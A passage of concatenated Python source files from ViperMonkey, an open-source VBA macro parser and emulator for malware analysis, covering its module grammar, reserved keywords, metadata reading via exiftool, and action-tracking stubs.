| if (not isinstance(loop, statements.While_Statement)): 142 | return loop 143 | 144 | # Try some canned transformations. 145 | r = _transform_dummy_loop1(loop) 146 | r = _transform_wait_loop(r) 147 | 148 | # Return the modified loop. 149 | return r 150 | -------------------------------------------------------------------------------- /vipermonkey/core/meta.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: Read in document metadata item. 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | import logging 16 | import subprocess 17 | 18 | from logger import log 19 | 20 | class FakeMeta(object): 21 | pass 22 | 23 | def get_metadata_exif(filename): 24 | 25 | # Use exiftool to get the document metadata. 26 | output = None 27 | try: 28 | output = subprocess.check_output(["exiftool", filename]) 29 | except Exception as e: 30 | log.error("Cannot read metadata with exiftool. " + str(e)) 31 | return {} 32 | 33 | # Sanity check results. 34 | if (log.getEffectiveLevel() == logging.DEBUG): 35 | log.debug("exiftool output: '" + str(output) + "'") 36 | if (":" not in output): 37 | log.warning("Cannot read metadata with exiftool.") 38 | return {} 39 | 40 | # Store the metadata in an object. 41 | lines = output.split("\n") 42 | r = FakeMeta() 43 | for line in lines: 44 | line = line.strip() 45 | if ((len(line) == 0) or (":" not in line)): 46 | continue 47 | field = line[:line.index(":")].strip().lower() 48 | val = line[line.index(":") + 1:].strip().replace("...", "\r\n") 49 | setattr(r, field, val) 50 | 51 | # Done. 52 | return r 53 | -------------------------------------------------------------------------------- /vipermonkey/core/modules.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Modules 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | # For Python 2+3 support: 41 | from __future__ import print_function 42 | 43 | __version__ = '0.02' 44 | 45 | # --- IMPORTS ------------------------------------------------------------------ 46 | 47 | import logging 48 | 49 | from comments_eol import * 50 | from procedures import * 51 | from statements import * 52 | import vba_context 53 | from function_defn_visitor import * 54 | from vba_object import to_python 55 | 56 | from logger import log 57 | 58 | # === VBA MODULE AND STATEMENTS ============================================== 59 | 60 | # --- MODULE ----------------------------------------------------------------- 61 | 62 | class Module(VBA_Object): 63 | 64 | def _handle_func_decls(self, tokens): 65 | """ 66 | Look for functions/subs declared anywhere, including inside the body 67 | of other functions/subs. 68 | """ 69 | 70 | # Look through each parsed item in the module for function/sub 71 | # definitions. 72 | for token in tokens: 73 | if (not hasattr(token, "accept")): 74 | continue 75 | func_visitor = function_defn_visitor() 76 | token.accept(func_visitor) 77 | for i in func_visitor.func_objects: 78 | 79 | # Sub to add? 80 | if isinstance(i, Sub): 81 | if (log.getEffectiveLevel() == logging.DEBUG): 82 | log.debug("saving sub decl: %r" % i.name) 83 | self.subs[i.name] = i 84 | 85 | # Func to add? 86 | elif isinstance(i, Function): 87 | if (log.getEffectiveLevel() == logging.DEBUG): 88 | log.debug("saving func decl: %r" % i.name) 89 | self.functions[i.name] = i 90 | 91 | # Property Let function to add? 92 | elif isinstance(i, PropertyLet): 93 | if (log.getEffectiveLevel() == logging.DEBUG): 94 | log.debug("saving property let decl: %r" % i.name) 95 | self.props[i.name] = i 96 | 97 | def __init__(self, original_str, location, tokens): 98 | 99 | super(Module, self).__init__(original_str, location, tokens) 100 | 101 | self.name = None 102 | self.code = None # set by ViperMonkey after parsing 103 | self.attributes = {} 104 | self.options = [] 105 | self.functions = {} 106 | self.props = {} 107 | self.external_functions = {} 108 | self.subs = {} 109 | self.global_vars = {} 110 | self.loose_lines = [] 111 | 112 | # Save all function/sub definitions. 113 | self._handle_func_decls(tokens) 114 | 115 | # Handle other statements. 116 | for token in tokens: 117 | 118 | if isinstance(token, If_Statement_Macro): 119 | for n in token.external_functions.keys(): 120 | if (log.getEffectiveLevel() == logging.DEBUG): 121 | log.debug("saving external func decl: %r" % n) 122 | self.external_functions[n] = token.external_functions[n] 123 | 124 | elif isinstance(token, External_Function): 125 | if (log.getEffectiveLevel() == logging.DEBUG): 126 | log.debug("saving external func decl: %r" % token.name) 127 | self.external_functions[token.name] = token 128 | 129 | elif isinstance(token, Attribute_Statement): 130 | if (log.getEffectiveLevel() == logging.DEBUG): 131 | log.debug("saving attrib decl: %r" % token.name) 132 | self.attributes[token.name] = token.value 133 | 134 | elif isinstance(token, Global_Var_Statement): 135 | 136 | # Global variable initialization is now handled by emulating the 137 | # LooseLines blocks of code in the module. 138 | self.loose_lines.append(token) 139 | 140 | elif isinstance(token, Dim_Statement): 141 | 142 | # Global variable initialization is now handled by emulating the 143 | # LooseLines blocks of code in the module. 144 | self.loose_lines.append(token) 145 | 146 | elif isinstance(token, LooseLines): 147 | 148 | # Save the loose lines block itself. 149 | self.loose_lines.append(token) 150 | 151 | # Function and Sub definitions could be in the loose lines block. 152 | # Save those also. 153 | for curr_statement in token.block: 154 | if isinstance(curr_statement, External_Function): 155 | if (log.getEffectiveLevel() == logging.DEBUG): 156 | log.debug("saving external func decl: %r" % curr_statement.name) 157 | self.external_functions[curr_statement.name] = curr_statement 158 | 159 | self.name = self.attributes.get('VB_Name', None) 160 | 161 | def __repr__(self): 162 | r = 'Module %r\n' % self.name 163 | for sub in self.subs.values(): 164 | r += ' %r\n' % sub 165 | for func in self.functions.values(): 166 | r += ' %r\n' % func 167 | for extfunc in self.external_functions.values(): 168 | r += ' %r\n' % extfunc 169 | for prop in self.props.values(): 170 | r += ' %r\n' % func 171 | return r 172 | 173 | def eval(self, context, params=None): 174 | 175 | # Perform all of the const assignments first. 176 | for block in self.loose_lines: 177 | if (isinstance(block, Sub) or 178 | isinstance(block, Function) or 179 | isinstance(block, External_Function)): 180 | if (log.getEffectiveLevel() == logging.DEBUG): 181 | log.debug("Skip loose line const eval of " + str(block)) 182 | continue 183 | if (isinstance(block, LooseLines)): 184 | context.global_scope = True 185 | do_const_assignments(block.block, context) 186 | context.global_scope = False 187 | 188 | # Emulate the loose line blocks (statements that appear outside sub/func 189 | # defs) in order. 190 | done_emulation = False 191 | for block in self.loose_lines: 192 | if (isinstance(block, Sub) or 193 | isinstance(block, Function) or 194 | isinstance(block, External_Function)): 195 | if (log.getEffectiveLevel() == logging.DEBUG): 196 | log.debug("Skip loose line eval of " + str(block)) 197 | continue 198 | context.global_scope = True 199 | block.eval(context, params) 200 | context.global_scope = False 201 | done_emulation = True 202 | 203 | # Return if we ran anything. 204 | return done_emulation 205 | 206 | def to_python(self, context, params=None, indent=0): 207 | return to_python(self.loose_lines, context, indent=indent, statements=True) 208 | 209 | def load_context(self, context): 210 | """ 211 | Load functions/subs defined in the module into the given 212 | context. 213 | """ 214 | 215 | for name, _sub in self.subs.items(): 216 | if (log.getEffectiveLevel() == logging.DEBUG): 217 | log.debug('(1) storing sub "%s" in globals' % name) 218 | context.set(name, _sub) 219 | context.set(name, _sub, force_global=True) 220 | for name, _function in self.functions.items(): 221 | if (log.getEffectiveLevel() == logging.DEBUG): 222 | log.debug('(1) storing function "%s" in globals' % name) 223 | context.set(name, _function) 224 | context.set(name, _function, force_global=True) 225 | for name, _prop in self.props.items(): 226 | if (log.getEffectiveLevel() == logging.DEBUG): 227 | log.debug('(1) storing property let "%s" in globals' % name) 228 | context.set(name, _prop) 229 | context.set(name, _prop, force_global=True) 230 | for name, _function in self.external_functions.items(): 231 | if (log.getEffectiveLevel() == logging.DEBUG): 232 | log.debug('(1) storing external function "%s" in globals' % name) 233 | context.set(name, _function) 234 | for name, _var in self.global_vars.items(): 235 | if (log.getEffectiveLevel() == logging.DEBUG): 236 | log.debug('(1) storing global var "%s" = %s in globals (1)' % (name, str(_var))) 237 | if (isinstance(name, str)): 238 | context.set(name, _var) 239 | context.set(name, _var, force_global=True) 240 | if (isinstance(name, list)): 241 | context.set(name[0], _var, var_type=name[1]) 242 | context.set(name[0], _var, var_type=name[1], force_global=True) 243 | 244 | # see MS-VBAL 4.2 Modules 245 | # 246 | # MS-GRAMMAR: procedural_module_header = CaselessKeyword('Attribute') + CaselessKeyword('VB_Name') + Literal('=') + quoted_string 247 | # MS-GRAMMAR: procedural_module = procedural_module_header + procedural_module_body 248 | # MS-GRAMMAR: class_module = class_module_header + class_module_body 249 | # MS-GRAMMAR: module = procedural_module | class_module 250 | 251 | # Module Header: 252 | 253 | header_statement = attribute_statement 254 | # TODO: can we have '::' with an empty statement? 255 | header_statements_line = (Optional(header_statement + ZeroOrMore(Suppress(':') + header_statement)) + EOL.suppress()) | \ 256 | option_statement | \ 257 | type_declaration | \ 258 | simple_if_statement_macro 259 | module_header = ZeroOrMore(header_statements_line) 260 | 261 | # 5.1 Module Body Structure 262 | 263 | # 5.2 Module Declaration Section Structure 264 | 265 | # TODO: 5.2.1 Option Directives 266 | # TODO: 5.2.2 Implicit Definition Directives 267 | # TODO: 5.2.3 Module Declarations 268 | 269 | loose_lines = Forward() 270 | #declaration_statement = external_function | global_variable_declaration | loose_lines | option_statement | dim_statement | rem_statement 271 | declaration_statement = external_function | loose_lines | global_variable_declaration | \ 272 | option_statement | dim_statement | rem_statement | type_declaration 273 | declaration_statements_line = Optional(declaration_statement + ZeroOrMore(Suppress(':') + declaration_statement)) \ 274 | + EOL.suppress() 275 | 276 | module_declaration = ZeroOrMore(declaration_statements_line) 277 | 278 | # 5.3 Module Code Section Structure 279 | 280 | # TODO: 5.3.1 Procedure Declarations 281 | 282 | # TODO: add rem statememt and others? 283 | empty_line = EOL.suppress() 284 | 285 | pointless_empty_tuple = Suppress('(') + Suppress(')') 286 | 287 | class LooseLines(VBA_Object): 288 | """ 289 | A list of Visual Basic statements that don't appear in a Sub or Function. 290 | This is mainly appicable to VBScript files. 291 | """ 292 | 293 | def __init__(self, original_str, location, tokens): 294 | super(LooseLines, self).__init__(original_str, location, tokens) 295 | self.block = tokens.block 296 | log.info('parsed %r' % self) 297 | 298 | def __repr__(self): 299 | s = repr(self.block) 300 | if (len(s) > 35): 301 | s = s[:35] + " ...)" 302 | return 'Loose Lines Block: %s: %s statement(s)' % (s, len(self.block)) 303 | 304 | def to_python(self, context, params=None, indent=0): 305 | return to_python(self.block, context, indent=indent, statements=True) 306 | 307 | def eval(self, context, params=None): 308 | 309 | # Exit if an exit function statement was previously called. 310 | #if (context.exit_func): 311 | # return 312 | 313 | # Assign all const variables first. 314 | do_const_assignments(self.block, context) 315 | 316 | # Emulate the statements in the block. 317 | log.info("Emulating " + str(self) + " ...") 318 | context.global_scope = True 319 | for curr_statement in self.block: 320 | 321 | # Don't emulate declared functions. 322 | if (isinstance(curr_statement, Sub) or 323 | isinstance(curr_statement, Function) or 324 | isinstance(curr_statement, External_Function)): 325 | if (log.getEffectiveLevel() == logging.DEBUG): 326 | log.debug("Skip loose line eval of " + str(curr_statement)) 327 | continue 328 | 329 | # Is this something we can emulate? 330 | if (not isinstance(curr_statement, VBA_Object)): 331 | continue 332 | curr_statement.eval(context, params=params) 333 | 334 | # Was there an error that will make us jump to an error handler? 335 | if (context.must_handle_error()): 336 | break 337 | context.clear_error() 338 | 339 | # Run the error handler if we have one and we broke out of the statement 340 | # loop with an error. 341 | context.handle_error(params) 342 | 343 | loose_lines <<= OneOrMore(pointless_empty_tuple ^ simple_call_list ^ tagged_block ^ (block_statement + EOS.suppress()) ^ orphaned_marker)('block') 344 | loose_lines.setParseAction(LooseLines) 345 | 346 | # TODO: add optional empty lines after each sub/function? 347 | module_code = ZeroOrMore( 348 | option_statement 349 | | sub 350 | | function 351 | | property_let 352 | | Suppress(empty_line) 353 | | simple_if_statement_macro 354 | | loose_lines 355 | | type_declaration 356 | ) 357 | 358 | module_body = module_declaration + module_code 359 | 360 | #module = module_header + module_body 361 | module = ZeroOrMore( 362 | option_statement 363 | | sub 364 | | function 365 | | property_let 366 | | Suppress(empty_line) 367 | | simple_if_statement_macro 368 | | loose_lines 369 | | type_declaration 370 | | declaration_statements_line 371 | | header_statements_line 372 | ) 373 | module.setParseAction(Module) 374 | 375 | # === LINE PARSER ============================================================ 376 | 377 | # Parser matching any line of VBA code: 378 | vba_line = ( 379 | sub_start_line 380 | | sub_end 381 | | function_start 382 | | function_end 383 | | for_start 384 | | for_end 385 | | header_statements_line 386 | # check if we have a basic literal before checking simple_statement_line 387 | # otherwise we will get things like "Chr(36)" being reported as a Call_Statement 388 | | (expr_const + EOL.suppress()) 389 | | simple_statements_line 390 | | declaration_statements_line 391 | | empty_line 392 | | (expression + EOL.suppress()) 393 | ) 394 | -------------------------------------------------------------------------------- /vipermonkey/core/reserved.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Reserved Keywords 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | __version__ = '0.02' 41 | 42 | # --- IMPORTS ------------------------------------------------------------------ 43 | 44 | from pyparsing import * 45 | 46 | from logger import log 47 | from identifiers import * 48 | 49 | # --- RESERVED KEYWORDS ------------------------------------------------------ 50 | 51 | def caselessKeywordsList(keywords): 52 | """ 53 | build a pyparsing parser from a list of caseless keywords 54 | 55 | :param keywords: tuple or list of keyword names (strings) 56 | """ 57 | # start with the first keyword: 58 | p = CaselessKeyword(keywords[0]) 59 | # then add all the other keywords: 60 | for kw in keywords[1:]: 61 | p |= CaselessKeyword(kw) 62 | return p 63 | 64 | # 3.3.5.2 Reserved Identifiers and IDENTIFIER 65 | # A is a that is the first syntactic item of a statement or 66 | # declaration. 67 | statement_keyword = caselessKeywordsList( 68 | ("Call", "Const", "Declare", "DefBool", "DefByte", 69 | "DefCur", "DefDate", "DefDbl", "DefInt", "DefLng", "DefLngLng", "DefLngPtr", "DefObj", 70 | "DefSng", "DefStr", "DefVar", "Dim", "Do", "Else", "ElseIf", "End If", 71 | "Enum", "Event", "Exit", "Friend", "Function", 72 | "GoSub", "GoTo", "If", "Implements", "Let", "Loop", "LSet", "Next", 73 | "On", "Open", "Option", "Private", "Public", "RaiseEvent", "ReDim", 74 | "Resume", "RSet", "Select", "Set", "Static", "Stop", "Sub", 75 | "Unlock", "Wend", "While", "With")) 76 | 77 | rem_keyword = CaselessKeyword("Rem") 78 | 79 | # A is a that is used as part of the interior 80 | # syntactic structure of a statement. 81 | marker_keyword = caselessKeywordsList( 82 | ("As", "ByRef", "ByVal ", "Case", "For", "Each", "Else", "In", "New", 83 | "Shared", "Until", "WithEvents", "Optional", "ParamArray", "Preserve", 84 | "Tab", "Then")) 85 | 86 | # An is a that is used 87 | # as an operator within expressions. 88 | operator_identifier = caselessKeywordsList( 89 | ("AddressOf", "And", "Eqv", "Imp", "Is", "Like", "New", "Mod", 90 | "Not", "Or", "TypeOf", "Xor")) 91 | 92 | # A is a that is used within expressions 93 | # as if it was a normal program defined entity (section 2.2). 94 | reserved_name = caselessKeywordsList(( # TODO: fix this one! 95 | "CBool", "CByte", "CCur", "CDate", # "CDbl", "CDec", "CInt", 96 | "CLng", "CLngLng", "CLngPtr", "CSng", "CStr", "CVar", "CVErr", 97 | "DoEvents", "Fix", "Int", "Len", "LenB", "PSet", "Sgn", "String")) 98 | 99 | # A is a that is used in an expression as 100 | # if it was a program defined procedure name but which has special syntactic rules for 101 | # its argument. 102 | special_form = caselessKeywordsList(( 103 | "Array", "Circle", "InputB", "LBound", "UBound")) 104 | 105 | # A is used within a declaration to identify the specific 106 | # declared type (section 2.2) of an entity. 107 | 108 | # TODO: Add more of these as needed or generalize. 109 | #reserved_complex_type_identifier = caselessKeywordsList(("MSForms.fmScrollAction", "MSForms.ReturnSingle")) 110 | simple_type_identifier = Word(initChars=alphas, bodyChars=alphanums + '_') 111 | reserved_complex_type_identifier = Group(simple_type_identifier + ZeroOrMore("." + simple_type_identifier)) 112 | 113 | reserved_atomic_type_identifier = caselessKeywordsList(( 114 | "Boolean", "Byte", "Currency", "Date", "Double", "Integer", 115 | "Long", "LongLong", "LongPtr", "Single", "String", "Variant")) 116 | 117 | reserved_type_identifier = reserved_atomic_type_identifier | reserved_complex_type_identifier 118 | 119 | # A specifying "true" or "false" has a declared type of 120 | # Boolean and a data value of True or False, respectively. 121 | boolean_literal_identifier = CaselessKeyword("true") | CaselessKeyword("false") 122 | 123 | # An has a 124 | # declared type of Object and the data value Nothing. 125 | object_literal_identifier = CaselessKeyword("nothing") 126 | 127 | # A specifying 128 | # "empty" or "null" has a declared type of Variant and the data value Empty or Null, respectively. 129 | variant_literal_identifier = CaselessKeyword("empty") | CaselessKeyword("null") 130 | 131 | # A is a that represents a specific distinguished data value 132 | # (section 2.1). 133 | #literal_identifier = boolean_literal_identifier | object_literal_identifier \ 134 | # | variant_literal_identifier 135 | literal_identifier = boolean_literal_identifier | object_literal_identifier 136 | 137 | # A is a that currently has no defined 138 | # meaning to the VBA language but is reserved for use by language implementers. 139 | reserved_for_implementation_use = caselessKeywordsList(( 140 | "LINEINPUT", "VB_Base", "VB_Control", 141 | "VB_Creatable", "VB_Customizable", "VB_Description", "VB_Exposed", "VB_Ext_KEY ", 142 | "VB_GlobalNameSpace", "VB_HelpID", "VB_Invoke_Func", "VB_Invoke_Property ", 143 | "VB_Invoke_PropertyPut", "VB_Invoke_PropertyPutRefVB_MemberFlags", "VB_Name", 144 | "VB_PredeclaredId", "VB_ProcData", "VB_TemplateDerived", "VB_UserMemId", 145 | "VB_VarDescription", "VB_VarHelpID", "VB_VarMemberFlags", "VB_VarProcData ", 146 | "VB_VarUserMemId")) 147 | 148 | # A is a that currently has no defined meaning to the VBA language but 149 | # is reserved for possible future extensions to the language. 150 | future_reserved = caselessKeywordsList(("CDecl", "Decimal", "DefDec")) 151 | 152 | # reserved-identifier = Statement-keyword / marker-keyword / operator-identifier / 153 | # special-form / reserved-name / literal-identifier / rem-keyword / 154 | # reserved-for-implementation-use / future-reserved 155 | reserved_identifier = statement_keyword | marker_keyword | operator_identifier \ 156 | | special_form | reserved_name | literal_identifier | rem_keyword \ 157 | | reserved_for_implementation_use | future_reserved 158 | 159 | -------------------------------------------------------------------------------- /vipermonkey/core/stubbed_engine.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: VBA Library 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | __version__ = '0.02' 40 | 41 | # sudo pypy -m pip install unidecode 42 | import unidecode 43 | import string 44 | 45 | import logging 46 | from logger import log 47 | 48 | class StubbedEngine(object): 49 | """ 50 | Stubbed out Vipermonkey analysis engine that just supports tracking 51 | actions. 52 | """ 53 | 54 | def __init__(self): 55 | self.actions = [] 56 | 57 | def report_action(self, action, params=None, description=None): 58 | """ 59 | Callback function for each evaluated statement to report macro actions 60 | """ 61 | 62 | # store the action for later use: 63 | try: 64 | if (isinstance(action, str)): 65 | action = unidecode.unidecode(action.decode('unicode-escape')) 66 | except UnicodeDecodeError: 67 | action = ''.join(filter(lambda x:x in string.printable, action)) 68 | if (isinstance(params, str)): 69 | try: 70 | decoded = params.replace("\\", "#ESCAPED_SLASH#").decode('unicode-escape').replace("#ESCAPED_SLASH#", "\\") 71 | params = unidecode.unidecode(decoded) 72 | except Exception as e: 73 | log.warn("Unicode decode of action params failed. " + str(e)) 74 | params = ''.join(filter(lambda x:x in string.printable, params)) 75 | try: 76 | if (isinstance(description, str)): 77 | description = unidecode.unidecode(description.decode('unicode-escape')) 78 | except UnicodeDecodeError as e: 79 | log.warn("Unicode decode of action description failed. " + str(e)) 80 | description = ''.join(filter(lambda x:x in string.printable, description)) 81 | self.actions.append((action, params, description)) 82 | log.info("ACTION: %s - params %r - %s" % (action, params, description)) 83 | -------------------------------------------------------------------------------- /vipermonkey/core/tagged_block_finder_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of locally defined functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from statements import * 41 | 42 | class tagged_block_finder_visitor(visitor): 43 | """ 44 | Collect all the tagged block (labeled block) elements. 45 | """ 46 | 47 | def __init__(self): 48 | self.blocks = {} 49 | self.visited = set() 50 | 51 | def visit(self, item): 52 | if (item in self.visited): 53 | return False 54 | self.visited.add(item) 55 | if (isinstance(item, TaggedBlock)): 56 | self.blocks[item.label] = item 57 | return True 58 | -------------------------------------------------------------------------------- /vipermonkey/core/utils.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey - Utility functions. 3 | 4 | Author: Philippe Lagadec - http://www.decalage.info 5 | License: BSD, see source code or documentation 6 | 7 | Project Repository: 8 | https://github.com/decalage2/ViperMonkey 9 | """ 10 | 11 | #=== LICENSE ================================================================== 12 | 13 | # ViperMonkey is copyright (c) 2015-2018 Philippe Lagadec (http://www.decalage.info) 14 | # All rights reserved. 15 | # 16 | # Redistribution and use in source and binary forms, with or without modification, 17 | # are permitted provided that the following conditions are met: 18 | # 19 | # * Redistributions of source code must retain the above copyright notice, this 20 | # list of conditions and the following disclaimer. 21 | # * Redistributions in binary form must reproduce the above copyright notice, 22 | # this list of conditions and the following disclaimer in the documentation 23 | # and/or other materials provided with the distribution. 24 | # 25 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 26 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 27 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 28 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 29 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 30 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 31 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 32 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 33 | # OR TORT (INCLUDING 